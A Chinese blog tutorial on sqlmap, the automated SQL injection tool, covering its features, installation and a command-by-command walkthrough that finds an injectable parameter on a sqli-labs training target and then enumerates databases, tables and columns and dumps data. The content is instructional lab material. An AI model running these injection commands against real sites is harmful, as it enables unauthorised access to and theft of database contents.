美文网首页
sqlmap使用

sqlmap使用

作者: 阿尼奥赛哟 | 来源:发表于2020-06-06 10:03 被阅读0次

    1. sqlmap简介

    SQLmap是一款用来检测与利用SQL漏洞的注入神器。开源的自动化SQL注入工具,由Python写成,具有如下特点:

    完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。

    完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。

    在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。

    支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列。

    支持自动识别密码哈希格式并通过字典破解密码哈希。

    支持完全地下载某个数据库中的某个表,也可以只下载某个表中的某几列,甚至只下载某一列中的部分数据,这完全取决于用户的选择。

    支持在数据库管理系统中搜索指定的数据库名、表名或列名

    当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持下载或上传文件。

    当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持执行任意命令并回现标准输出。

    2. 安装步骤

    (1) Linux下载 官网:  http://sqlmap.org/

    下载:  git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

    (2) Windows下载 

    先下载python2=》将下载好的sqlmap解压到其文件中

    3. sqlmap攻击过程

    (1) 探测目标url(找寻漏洞点)

    python sqlmap.py -u http://192.168.29.10/sqli-labs/Less-1/?id=2 -batch -dbms=mysql

    如图所示,提示id易攻击(找到攻击点)

    (2)在监测存在注入漏洞后,开始爆库 命令是-dbs

    python sqlmap.py -u http://192.168.29.10/sqli-labs/Less-1/?id=2 -batch -dbms=mysql -dbs

    当前库名 -current-db

    python sqlmap.py -u http://192.168.29.10/sqli-labs/Less-1/?id=2 -batch  -current-db -dbms=mysql -dbs

    (3)知道当前表名后开始 爆表,命令: -D '库名' --tables

    python sqlmap.py -u http://192.168.29.10/sqli-labs/Less-1/?id=2 -batch  -D ‘security' --tables

      (4) 爆表中字段 -D ’库名‘ -T ’表名’ --columns

      (5) 爆表中数据  -D '库名'  -T '表名' --dump

    相关文章

      网友评论

          本文标题:sqlmap使用

          本文链接:https://www.haomeiwen.com/subject/fatgzhtx.html